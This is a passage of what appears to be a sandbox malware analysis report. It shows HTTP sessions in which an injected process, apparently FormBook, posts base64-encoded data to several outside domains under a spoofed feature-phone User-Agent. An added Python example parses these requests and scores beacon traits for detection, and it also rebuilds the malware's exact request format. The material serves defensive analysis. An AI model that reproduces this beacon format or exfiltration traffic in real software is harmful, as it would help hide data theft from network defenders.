                    Data Ascii: 6X=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6jwGxAFRUdmbJ+vvxV1okQXlnkaLrTfrBPQMybUYsAWz0tuRM7zaVSE7RhzJM2bij3ENx29ejlyKY1q/NIbr15clYqy9D+HSUXt1fNsMpFgYV791vV7Qh9izoJRQ/AcYBc2Y45yrU2TVFP1AvJ+QGqX0KDxkRfRHLyTDfeVoFBxEAMw=


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    19          192.168.2.4  49756        3.33.130.190    80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:30.156694889 CEST  10853              OUT        POST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 34 47 78 31 5a 52 55 36 4b 62 49 2b 76 76 2b 46 31 6c 6b 51 57 35 6e 6b 53 48 72 54 54 37 42 4e 59 4d 7a 36 30 59 38 68 57 7a 39 74 75 52 4f 37 7a 58 62 79 45 75 52 68 6a 4e 4d 32 4c 69 6a 33 45 4e 78 30 6c 65 67 77 47 4b 65 31 71 38 48 6f 62 6e 2f 5a 64 4d 59 75 6d 48 44 2b 7a 6b 56 6d 4e 31 66 74 38 4d 36 48 59 59 54 72 39 7a 73 56 36 44 68 39 6d 53 6f 4e 49 76 2f 41 6f 68 42 65 71 59 36 39 6d 38 4d 32 58 4e 5a 75 46 62 2f 4a 75 50 4f 35 76 71 4d 68 68 6e 48 4b 4e 70 58 43 48 63 51 35 67 4d 41 43 70 48 66 6f 45 4b 73 2b 51 56 4b 32 75 70 71 66 6c 4a 73 53 69 6b 64 71 4a 51 75 6d 39 67 43 6d 6e 44 57 65 56 2f 2b 4a 4a 7a 4f 46 41 68 66 62 4a 37 41 34 71 38 65 32 6f 6a 57 78 39 48 6a 2b 65 74 4a 56 6a 67 73 4a 72 2b 7a 57 4a 4e 6b 30 48 30 55 69 57 55 55 37 68 6d 6a 71 6e 35 59 6e 35 6e 55 2b 54 6c 69 59 4b 69 5a 57 43 2f 65 4f 76 79 64 71 43 4b 30 45 2b 45 63 37 32 [TRUNCATED]
                    Data Ascii: 6X=... [TRUNCATED]


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    20          192.168.2.4  49757        3.33.130.190    80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:32.696283102 CEST  487                OUT        GET /7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.autonashville.com
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:33.165461063 CEST  400                IN         HTTP/1.1 200 OK
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:41:33 GMT
                    Content-Type: text/html
                    Content-Length: 260
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 58 3d 78 6d 49 4f 46 42 69 58 56 72 30 2f 51 69 42 74 6c 66 70 70 79 63 70 36 39 67 34 67 49 4b 76 2f 6c 4e 7a 55 66 37 76 43 38 7a 63 45 30 6e 46 69 59 5a 53 32 4c 4d 2b 32 33 32 67 70 75 7a 36 38 6c 6c 58 66 6a 41 33 35 42 72 6f 49 37 36 67 45 6d 69 65 66 38 70 53 7a 42 4b 33 5a 56 54 38 65 66 7a 58 6a 4c 67 62 69 6a 56 41 41 35 6e 55 6b 73 51 75 64 49 77 30 3d 26 5f 76 66 74 3d 76 78 57 6c 62 44 69 38 69 70 61 34 39 6a 7a 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp"}</script></head></html>

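The sessions above all come from the same injected process (PID 5924) and share one shape per host: a POST with a single "6X=<base64>" form field to a four-character directory, a second slightly longer POST, a third POST of 10299 bytes, then a GET carrying the same field plus "_vft=<16 characters>", every request with Connection: close, Origin and Referer pointing at the beacon URL itself, and an Openwave feature-phone User-Agent that no Windows host sends on its own. FormBook walks a list of candidate domains of which most are decoys, so the nginx and Apache 404s and the parking-style 200 (an openresty JavaScript redirect to /lander that echoes the query) are expected and say nothing about which host is the live panel. What follows is an added example, not code from the Joe Sandbox report or from the sample: a parser for raw HTTP/1.1 requests and a scorer for those traits, run over a replay rebuilt from the captured headers. BODY_1 and BODY_2 are copied from sessions 9 and 10; BODY_3 is a constructed stand-in of the captured length because the report truncates it; all function names, the three-trait and 10x thresholds and the www.example.com control request are this example's own assumptions.

```python
"""Added example, not part of the sandbox report: parse raw HTTP/1.1 requests
and score the FormBook-style beacon traits visible in sessions 9 to 21.
BODY_1/BODY_2 are copied from sessions 9 and 10; BODY_3 is a constructed
stand-in for the truncated 10299-byte body; names and thresholds are this
example's own assumptions."""
import re
from collections import defaultdict

# Identical User-Agent on every captured request (a feature-phone browser string).
BEACON_UA = ("SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 "
             "Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0")
DIR_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")                      # /edpl/, /6m23/, ...
FIELD_RE = re.compile(r"^[A-Za-z0-9]{2}=[A-Za-z0-9+/]+={0,2}$")  # 6X=<base64>
QUERY_RE = re.compile(r"^[A-Za-z0-9]{2}=[A-Za-z0-9+/]+={0,2}&_vft=[A-Za-z0-9]{16}$")

def parse_request(raw):
    """Split one raw request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}

def beacon_indicators(req):
    """Names of the beacon traits present in one parsed request."""
    h, hits = req["headers"], []
    host = h.get("host", "")
    if h.get("user-agent") == BEACON_UA:
        hits.append("fixed-ua")
    if DIR_RE.match(req["path"]):
        hits.append("4char-dir")
    if h.get("connection", "").lower() == "close":
        hits.append("conn-close")
    if req["method"] == "POST":
        # Origin and Referer point at the beacon URL itself, as in the capture.
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            hits.append("self-referer")
        if FIELD_RE.match(req["body"]):
            hits.append("single-b64-field")
    elif req["method"] == "GET" and QUERY_RE.match(req["query"]):
        hits.append("b64-query-vft")
    return hits

def is_beacon(req, min_hits=3):
    """Assumption: three or more traits on one request is a hit."""
    return len(beacon_indicators(req)) >= min_hits

def host_cadence(requests):
    """Per host, the ordered (method, body length) of flagged requests."""
    seq = defaultdict(list)
    for req in requests:
        if is_beacon(req):
            seq[req["headers"].get("host", "")].append((req["method"], len(req["body"])))
    return dict(seq)

def formbook_hosts(requests):
    """Hosts showing the captured cycle: two short POSTs, one POST at least
    10x larger (assumed ratio), then a GET carrying the same field."""
    hits = []
    for host, seq in host_cadence(requests).items():
        methods, sizes = [m for m, _ in seq], [n for _, n in seq]
        if methods[:4] == ["POST", "POST", "POST", "GET"] and sizes[2] > 10 * sizes[0]:
            hits.append(host)
    return sorted(hits)

# Constructed replay: bodies from sessions 9 and 10, stand-in for the truncated third.
BODY_1 = "6X=n9Z7p+EBOElJb9+7GbuOPpzdG1oIoztBAaxGmU4Oiu2lYKZFpO3Wb5fsFl7Tv/689d53oDx/Qez5qA1pz5DgOlezUEXZJ/ve7j35HddE31LU6+qWZ4NsP7AZ56W4w8AlK6gCDJPsS+YskQrBM+KMGTC3nqfcbOyXnRPd1RvjYs6AEvd3+4TTqARuUeT8xkNtNw=="
BODY_2 = "6X=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcSlZrpFoMPWc5fsOF7Wwv6i9cF/oGR/Qen5qBFpyK7/clexckXbWvve7j35HdIr31jU6PaWIqlvFbAa66W408A5K6gwDMqJS9gskRbBMvKPfDCxoKeffNjSrE3d8CL6f++kIJMtvJyE4A1dJZaI8nwkWxavv5ZVNpAKrRSgkAcmU1I="
BODY_3 = "6X=" + "A" * 10296   # stand-in with the captured Content-Length of 10299
QUERY = ("6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/"
         "hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp")

def build_request(method, host, path, body="", query=""):
    """Rebuild a request with exactly the header set seen in the capture."""
    common = ("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,"
              "image/avif,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.9\r\n")
    if method == "POST":
        return (f"POST {path} HTTP/1.1\r\n" + common + "Accept-Encoding: gzip, deflate\r\n"
                f"Host: {host}\r\nOrigin: http://{host}\r\nContent-Length: {len(body)}\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\nCache-Control: no-cache\r\n"
                f"Connection: close\r\nReferer: http://{host}{path}\r\n"
                f"User-Agent: {BEACON_UA}\r\n\r\n" + body)
    return (f"GET {path}?{query} HTTP/1.1\r\n" + common + f"Host: {host}\r\n"
            f"Connection: close\r\nUser-Agent: {BEACON_UA}\r\n\r\n")

def sample_requests():
    """Full cycle for the three hosts that show it above, the first POST only
    for www.dom-2.online (as in session 21), plus one unrelated control."""
    raws = []
    for host, path in [("www.hm62t.top", "/edpl/"), ("www.zhuoyueapp.top", "/6m23/"),
                       ("www.autonashville.com", "/7d10/")]:
        raws += [build_request("POST", host, path, BODY_1), build_request("POST", host, path, BODY_2),
                 build_request("POST", host, path, BODY_3), build_request("GET", host, path, query=QUERY)]
    raws.append(build_request("POST", "www.dom-2.online", "/m409/", BODY_1))
    raws.append("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n")
    return [parse_request(r) for r in raws]

if __name__ == "__main__":
    reqs = sample_requests()
    print(host_cadence(reqs), formbook_hosts(reqs))
```

Running the block prints the per-host cadence and the three hosts on which the full four-request cycle appears; www.dom-2.online is left out only because this excerpt shows a single POST to it. The per-request traits (the fixed User-Agent, the 6X= field, the four-character directory) map directly onto an IDS rule, which is what the Suricata alerts in this report key on; the cadence check is the part that needs session stitching, because every request here closes its own connection.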

                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    21          192.168.2.4  49758        199.59.243.227  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:46.343069077 CEST  736                OUT        POST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 68 54 56 75 74 54 48 56 35 4e 45 4d 76 30 5a 30 35 78 4a 4b 70 6c 75 49 68 38 7a 68 74 51 33 65 6a 52 63 55 43 6d 6d 74 67 72 71 2b 78 58 4f 6a 77 76 30 47 6f 71 67 59 46 50 75 4d 35 57 52 44 4b 6d 6e 62 58 38 37 2b 4b 56 74 35 4e 79 2b 6a 4e 43 66 49 45 33 42 6f 79 48 69 30 55 75 55 38 48 75 4d 52 37 33 45 78 39 59 4b 48 7a 4d 70 43 4e 73 34 6f 52 70 57 6d 71 61 6c 6f 71 5a 7a 46 79 57 4a 62 63 65 6d 33 69 70 66 4b 6c 32 57 52 56 47 7a 67 67 74 2f 71 72 77 31 4a 47 7a 45 52 41 76 77 71 52 30 53 31 4f 2b 56 56 58 59 73 61 4f 52 62 6c 73 77 3d 3d
                    Data Ascii: 6X=ii7XstaMoFqjhTVutTHV5NEMv0Z05xJKpluIh8zhtQ3ejRcUCmmtgrq+xXOjwv0GoqgYFPuM5WRDKmnbX87+KVt5Ny+jNCfIE3BoyHi0UuU8HuMR73Ex9YKHzMpCNs4oRpWmqaloqZzFyWJbcem3ipfKl2WRVGzggt/qrw1JGzERAvwqR0S1O+VVXYsaORblsw==
                    Sep 22, 2024 17:41:46.915824890 CEST | 1236 | IN | HTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:46 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: 5d57d9fc-8aea-40ee-a5fd-37fa40c7b870
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=5d57d9fc-8aea-40ee-a5fd-37fa40c7b870; expires=Sun, 22 Sep 2024 15:56:46 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:46.916270018 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWQ1N2Q5ZmMtOGFlYS00MGVlLWE1ZmQtMzdmYTQwYzdiODcwIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    22 | 192.168.2.4 | 49759 | 199.59.243.227 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:41:48.889799118 CEST | 756 | OUT | POST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 6a 65 6a 30 67 55 42 6a 61 74 6c 72 71 2b 6c 6e 4f 6d 2b 50 30 33 6f 71 63 36 46 50 69 4d 35 57 56 44 4b 6e 58 62 58 50 54 39 4c 46 73 66 42 53 2f 6c 4a 43 66 49 45 33 42 6f 79 47 53 65 55 75 63 38 48 65 51 52 36 57 45 77 7a 34 4b 47 79 4d 70 43 61 38 34 7a 52 70 57 55 71 62 35 4f 71 62 37 46 79 58 5a 62 64 4c 4b 30 6f 70 65 67 68 32 57 47 57 33 61 72 74 74 75 74 30 43 78 75 4e 51 63 54 42 70 68 77 41 46 7a 69 63 2b 78 6d 4b 66 6c 75 44 53 6d 73 33 35 70 53 71 73 37 57 54 50 52 68 6e 76 61 34 6a 57 78 33 64 56 73 3d
                    Data Ascii: 6X=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtijej0gUBjatlrq+lnOm+P03oqc6FPiM5WVDKnXbXPT9LFsfBS/lJCfIE3BoyGSeUuc8HeQR6WEwz4KGyMpCa84zRpWUqb5Oqb7FyXZbdLK0opegh2WGW3arttut0CxuNQcTBphwAFzic+xmKfluDSms35pSqs7WTPRhnva4jWx3dVs=
                    Sep 22, 2024 17:41:49.394556046 CEST | 1236 | IN | HTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:48 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: b8f4cb3f-73eb-433e-88ac-2b9deddd6d2c
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=b8f4cb3f-73eb-433e-88ac-2b9deddd6d2c; expires=Sun, 22 Sep 2024 15:56:49 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:49.394926071 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjhmNGNiM2YtNzNlYi00MzNlLTg4YWMtMmI5ZGVkZGQ2ZDJjIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    23 | 192.168.2.4 | 49760 | 199.59.243.227 | 80 | 5924 | C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Sep 22, 2024 17:41:51.432990074 CEST | 10838 | OUT | POST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 62 65 6a 42 73 55 54 41 79 74 6d 72 71 2b 35 33 4f 6e 2b 50 30 51 6f 71 45 2b 46 4f 66 37 35 56 39 44 4b 46 66 62 56 2b 54 39 41 46 73 66 63 69 2f 31 4e 43 66 6e 45 32 78 73 79 47 69 65 55 75 63 38 48 66 67 52 39 48 45 77 78 34 4b 48 7a 4d 70 4f 4e 73 35 63 52 74 36 45 71 59 56 34 71 72 62 46 79 33 70 62 52 64 2b 30 79 70 66 47 6d 32 58 44 57 33 47 6b 74 73 43 51 30 44 56 55 4e 57 67 54 44 6f 45 59 62 46 6a 75 47 34 31 70 4b 4e 41 4d 50 54 53 57 35 37 63 76 36 75 58 79 46 2b 55 4f 6d 66 66 61 33 47 64 37 42 79 74 55 55 6a 66 54 34 51 30 50 66 52 55 4f 34 46 73 52 46 61 6b 6d 6d 49 4f 73 56 43 34 2b 41 33 64 67 68 6a 77 63 78 4d 42 75 4f 51 72 58 39 6e 66 53 2b 50 50 36 32 2f 68 4c 53 58 7a 2b 38 37 2f 58 56 4b 53 5a 39 4c 46 78 75 69 4a 47 45 35 34 2b 56 76 67 6e 6f 32 51 41 4c 4d 67 5a 42 4e 70 41 57 4c 38 68 47 4f 33 5a 56 65 53 6c 56 38 78 6f 48 46 72 49 32 75 5a [TRUNCATED]
                    Data Ascii: 6X= [TRUNCATED]
                    Sep 22, 2024 17:41:52.520904064 CEST | 1236 | IN | HTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:51 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: a30e9cb6-6d56-4a70-b349-d0b8adef285a
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=a30e9cb6-6d56-4a70-b349-d0b8adef285a; expires=Sun, 22 Sep 2024 15:56:51 GMT; path=/
                    connection: close
